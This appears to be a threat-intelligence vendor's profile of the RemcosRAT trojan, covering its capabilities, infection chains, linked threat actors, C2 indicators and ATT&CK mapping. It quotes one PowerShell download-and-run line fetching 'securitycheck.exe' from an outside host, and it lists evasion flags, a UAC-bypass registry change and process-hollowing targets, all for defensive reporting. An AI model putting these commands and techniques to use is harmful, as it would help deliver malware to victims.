RemcosRAT
RemcosRAT is a full-featured remote access trojan used across a wide range of criminal and espionage-motivated campaigns. The provided reporting consistently describes capabilities including remote command execution, file and process management, keylogging, screenshot capture, webcam and microphone surveillance, clipboard monitoring, browser and application data theft, and credential harvesting. Observed configurations include storage of keylogs in logs.dat, screenshot capture at 10-second intervals, audio recording in 5-second clips, mutexes such as Rmc-E3G25N and Rmc-3UG3BG, install names such as remcos.exe, and registry persistence under HKCU\Software\Remcos. RemcosRAT configurations were noted as RC4-encrypted in PE resources, and some infrastructure exposed the default Remcos TLS certificate profile with empty subject/issuer fields and long-lived validity dates.
In the supplied content, RemcosRAT is delivered through multiple infection vectors: phishing emails with business, legal, invoice, purchase inquiry, court summons, SWIFT transfer, and procurement lures; malicious HTA, JavaScript, XLS macro, SVG, MSI, ZIP, RAR, 7z, LNK, DOC/DOCX, VBS, PowerShell, and AutoIt stages; DLL sideloading with signed VMware and Microsoft Edge binaries; process hollowing into legitimate Microsoft binaries including Aspnet_compiler.exe and Msbuild.exe; counterfeit VeraCrypt installers; illegal gambling-related tools; and loader ecosystems such as HijackLoader, SHADOWLADDER, GHOSTPULSE, GoLoader, Amadey, and crypter-as-a-service AutoIt stubs. Specific observed chains include a four-stage March 2026 campaign using a JavaScript attachment, PowerShell decryption, a .NET loader named DEV.dll, and hollowing into Aspnet_compiler.exe, with C2 at 216.250.249.222 over raw TCP on ports 80 and 443; and an HTA-based RemcosRAT 7.2.0 Pro campaign tagged "SkyLNK" using mshta.exe, PowerShell, obfuscated JavaScript, reflective .NET loading, and hollowing into Msbuild.exe, with C2 domain goodpeopleswhitbrigheartwinthisindustryi.duckdns.org:14646 and staging at 96.44.159.218.
The malware appears in both commodity cybercrime and state-linked activity. The content links RemcosRAT to UAC-0184 targeting Ukraine’s Defense Forces via messenger-based social engineering to steal documents and messenger data, including Signal-related data; to UAC-0050 / DaVinci Group activity targeting Ukraine and a European financial institution; to campaigns targeting Russian organizations alongside DarkTrack RAT; to attacks targeting Ukraine; to Red Akodon phishing campaigns against Colombian victims; to Shadow Vector campaigns in Colombia; to South Korean campaigns using gambling lures and trojanized VeraCrypt installers; and to North Korean KONNI/Konni-linked activity using KakaoTalk-delivered malware. It is also repeatedly listed as a payload distributed by Amadey pay-per-install operations and by the GoLoader loader-as-a-service framework.
High-confidence indicators and artifacts directly mentioned in the content include C2 and staging infrastructure such as the-new-age.co.ua:443, biches-yeah.co.ua:443, 178.33.57.149:443, 178.33.57.159:8899, 88.151.192.14:443, 216.250.249.222:80/443, 96.44.159.137 ports 14641/14642/14645/14646/14647, 96.44.159.218, and goodpeopleswhitbrigheartwinthisindustryi.duckdns.org:14646; sample and campaign artifacts including DEV.dll GUID ab88dfb2-73aa-4da1-bf05-e72424ad8034, Remcos license hash 72214B9FB81C38C5D9F33A771B74F635, botnet ID "SkyLNK," and imphash 737fc4be4f9f7d7c06c790667c9f7669. The content also notes repeated use of RemcosRAT in campaigns targeting government, healthcare, technology, manufacturing, defense, finance, and telecom-related victims across multiple regions.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
7 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
“These installers executed AutoIt scripts… that deployed multiple RATs (RemcosRAT, QuasarRAT, and RftRAT)…”
The files distributed were malicious AutoIt scripts and modules that enable remote access and keylogging, as well as various RATs, including LilithRAT and RemcosRAT.
Red Akodon targets users... using remote access trojans (RAT) like RemcosRAT, QasarRat, AsyncRAT, and XWorm.
"...and remote access trojans such as RemcosRAT in attacks targeting Ukraine."
"...to attack Russian organizations... with malware like RemcosRAT and DarkTrack RAT..."
"...and remote access trojans such as RemcosRAT in attacks targeting Ukraine."
Techniques & procedures
35 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 techniqueMITRE ATT&CK T1583.003 — Virtual Private Server (PFCLOUD, ThinkHuge, OMEGATECH)
Initial Access
2 techniquesMITRE ATT&CK Mapping Tactic Technique ID Implementation Initial Access Phishing: Spearphishing Attachment T1566.001 Email with "Bank slip.exe", "Payment Advice.exe"
основним каналом доставки шкідливих програм є популярні месенджери, а методи первинного проникнення передбачають використання елементів соціальної інженерії
Execution
7 techniquesExecution Windows Management Instrumentation T1047 Win32_Process.Create() hidden window launch
The PowerShell runs with the standard evasion flags: -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden.
Execution VBScript T1059.005 HTA VBScript execution in mshta.exe
Execution JavaScript T1059.007 WScript execution of obfuscated JS dropper
MITRE ATT&CK Mapping Tactic Technique ID Implementation Execution Command and Scripting: AutoIt T1059.010 AutoIt-compiled loader with WRSJLIM cipher
Execution Shared Modules T1129 .NET Assembly.Load() for DEV.dll reflective loading
під час якого останньому передається файл (архів) з проханням допомогти у його відкритті/обробці
Persistence
1 techniquePrivilege Escalation
4 techniquesMITRE ATT&CK Mapping Tactic Technique ID Implementation Defense Evasion Process Injection T1055 VirtualAlloc RWX + DllCallAddress shellcode execution
Defense Evasion Process Hollowing T1055.012 Aspnet_compiler.exe hollowed via NT API
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Patchhelp_beta.lnk ... Streamsvc.lnk ... appBg.lnk
Privilege Escalation Bypass UAC T1548.002 Registry: EnableLUA = 0 modification
Stealth
8 techniquesDefense Evasion Obfuscated Files or Information T1027 Whitespace padding, random case, base64, delimiter-based concatenation
Defense Evasion Masquerading T1036 Abuse of Msbuild.exe as LOLBin host
MITRE ATT&CK Mapping Tactic Technique ID Implementation Defense Evasion Masquerading: Invalid Code Signature T1036.001 Stolen/abused code signing certs
MITRE ATT&CK Mapping Tactic Technique ID Implementation Defense Evasion Process Injection T1055 VirtualAlloc RWX + DllCallAddress shellcode execution
Defense Evasion Process Hollowing T1055.012 Aspnet_compiler.exe hollowed via NT API
Defense Evasion Deobfuscate/Decode Files T1140 Base64, UTF-16LE, delimiter stripping
Defense Evasion Virtualization/Sandbox Evasion T1497 3-second sleep timer
MITRE ATT&CK Mapping Technique ID Usage Reflective Code Loading T1620 Go-based reflective PE loader (both v1 and v2)
Credential Access
2 techniquesCredential Access Keylogging T1056.001 Continuous keylogging to logs.dat
Credential Access Credentials from Password Stores T1555 Outlook credential theft via Nirsoft tools
Discovery
1 techniqueCollection
5 techniquesCredential Access Keylogging T1056.001 Continuous keylogging to logs.dat
Collection Screen Capture T1113 Periodic screenshots to Screenshots/ directory
Collection Email Collection T1114 Outlook account access
Collection Audio Capture T1123 5-second audio recording clips
Collection Video Capture T1125 Camera access via OpenCamera/CloseCamera
Command and Control
8 techniquesCommand and Control Application Layer Protocol T1071 TLS-encrypted C2 on port 14646
The RAT -- compiled February 3, 2026 -- phones home to a dedicated C2 at 216.250.249.222 on ports 80 and 443 using Remcos proprietary protocol (not HTTP, not TLS -- raw TCP masquerading on web ports).
Command and Control Web Service T1102 Paste services (pastefy.app, pastes.io) for payload hosting
-uri http://yeah-biches.kyiv.ua/securitycheck.exe -OutFile securitycheck.exe; start securitycheck.exe
Command and Control Dynamic Resolution T1568.002 DuckDNS for C2 domain resolution
Command and Control Non-Standard Port T1571 Remcos protocol on ports 80/443 (not HTTP/TLS)
Command and Control Encrypted Channel T1573 Optional TLS mode available in configuration
Exfiltration
1 techniqueSIGTOP та TUSC використовуються для викрадення та вивантаження даних з ЕОМ
IOCs tracked for this family
84 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
22 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A remote access trojan mentioned as one of the payloads delivered by PhantomVAI in other campaigns.
A commercial remote access trojan abused in cybercrime campaigns. In this campaign it is delivered through a four-stage chain, process-hollowed into Aspnet_compiler.exe, and used for surveillance and remote control including keylogging, camera access, audio recording, screenshots, file management, command execution, and watchdog behavior.
A remote access trojan observed among the malware families delivered by the same AutoIt crypter operation.
A remote access trojan delivered by the same JavaScript wrapper technique in the broader campaign wave.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.